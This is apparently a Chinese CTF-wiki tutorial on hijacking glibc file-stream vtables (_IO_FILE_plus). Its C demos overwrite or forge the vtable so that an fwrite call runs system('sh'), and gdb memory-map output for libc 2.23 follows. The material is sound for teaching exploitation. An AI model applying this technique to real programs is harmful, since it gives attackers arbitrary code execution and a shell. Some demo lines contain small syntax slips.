跳转至

伪造vtable劫持程序流程

简介

前面我们介绍了Linux中文件流的特性(FILE),我们可以得知Linux中的一些常见的IO操作函数都需要经过FILE结构进行处理。尤其是_IO_FILE_plus结构中存在vtable,一些函数会取出vtable中的指针进行调用。

因此伪造vtable劫持程序流程的中心思想就是针对_IO_FILE_plus的vtable动手脚,通过把vtable指向我们控制的内存,并在其中布置函数指针来实现。

因此vtable劫持分为两种,一种是直接改写vtable中的函数指针,通过任意地址写就可以实现。另一种是覆盖vtable的指针指向我们控制的内存,然后在其中布置函数指针。

实践

这里演示了修改vtable中的指针,首先需要知道_IO_FILE_plus位于哪里,对于fopen的情况下是位于堆内存,对于stdin\stdout\stderr是位于libc.so中。

int main(void)
{
    FILE *fp;
    long long *vtable_ptr;
    fp=fopen("123.txt","rw");
    vtable_ptr=*(long long*)((long long)fp+0xd8);     //get vtable

    vtable_ptr[7]=0x41414141 //xsputn

    printf("call 0x41414141");
}

根据vtable在_IO_FILE_plus的偏移得到vtable的地址,在64位系统下偏移是0xd8。之后需要搞清楚欲劫持的IO函数会调用vtable中的哪个函数。关于IO函数调用vtable的情况已经在FILE结构介绍一节给出了,知道了printf会调用vtable中的xsputn,并且xsputn的是vtable中第八项之后就可以写入这个指针进行劫持。

并且在xsputn等vtable函数进行调用时,传入的第一个参数其实是对应的_IO_FILE_plus地址。比如这例子调用printf,传递给vtable的第一个参数就是_IO_2_1_stdout_的地址。

利用这点可以实现给劫持的vtable函数传參,比如

#define system_ptr 0x7ffff7a52390;

int main(void)
{
    FILE *fp;
    long long *vtable_ptr;
    fp=fopen("123.txt","rw");
    vtable_ptr=*(long long*)((long long)fp+0xd8);     //get vtable

    memcopy(fp,"sh",3);

    vtable_ptr[7]=system_ptr //xsputn


    fwrite("hi",2,1,fp);
}

但是在目前libc2.23版本下,位于libc数据段的vtable是不可以进行写入的。不过,通过在可控的内存中伪造vtable的方法依然可以实现利用。

#define system_ptr 0x7ffff7a52390;

int main(void)
{
    FILE *fp;
    long long *vtable_addr,*fake_vtable;

    fp=fopen("123.txt","rw");
    fake_vtable=malloc(0x40);

    vtable_addr=(long long *)((long long)fp+0xd8);     //vtable offset

    vtable_addr[0]=(long long)fake_vtable;

    memcpy(fp,"sh",3);

    fake_vtable[7]=system_ptr; //xsputn

    fwrite("hi",2,1,fp);
}

我们首先分配一款内存来存放伪造的vtable,之后修改_IO_FILE_plus的vtable指针指向这块内存。因为vtable中的指针我们放置的是system函数的地址,因此需要传递参数"/bin/sh"或"sh"。

因为vtable中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递,因此这里我们把"sh"写入_IO_FILE_plus头部。之后对fwrite的调用就会经过我们伪造的vtable执行system("sh")。

同样,如果程序中不存在fopen等函数创建的_IO_FILE时,也可以选择stdin\stdout\stderr等位于libc.so中的_IO_FILE,这些流在printf\scanf等函数中就会被使用到。在libc2.23之前,这些vtable是可以写入并且不存在其他检测的。

print &_IO_2_1_stdin_
$2 = (struct _IO_FILE_plus *) 0x7ffff7dd18e0 <_IO_2_1_stdin_>

0x00007ffff7a0d000 0x00007ffff7bcd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so